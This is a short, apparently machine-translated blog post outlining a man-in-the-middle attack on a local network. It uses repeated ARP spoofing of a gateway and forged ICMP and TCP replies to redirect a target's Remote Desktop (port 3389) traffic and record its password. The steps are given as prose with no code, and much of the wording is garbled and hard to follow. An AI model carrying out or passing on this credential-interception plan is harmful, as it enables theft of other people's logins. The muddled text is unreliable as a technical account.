This alternative approach is an alternative approach, and the path is different.
The principle is simpler.
Principle:
A. intermediary B. Target C. Client
Note:
This is because the environment is a little special. In this case, the process is to retrieve the MAC of the other party. Only the gateway MAC can be obtained.
But it does not matter. In order to test whether the environment meets the requirements, an ARP. B. Target fails to be sent to the Gateway. The entire recovery process is 20 minutes.
This determines that the gateway is not bound. ARP is supported, but an ARP entry can be redirected to the target for 20 minutes. This also indicates that the ARP table of the gateway is flushed.
The new speed is every 20 minutes. How can we achieve data forwarding without a target MAC?
Very bold test.
1. send ARP spoofing every 20 minutes.
2. Simulate ICMP to ping the target.
3. Simulate TCP three-way handshake. forge the illusion that http returns a black page.
4. C --> convert B .3389 to C --> A.3389 record Password
5. if the password is obtained successfully. stop port redirection. stop the simulation. stop arp sending. wait for the gateway to refresh the arp cache. at this time, neither party can log on. until the gateway is refreshed. in this long wait. ping the target IP address-T to go online.
6. The next step is to fight for character.
From the ethereal Baidu Space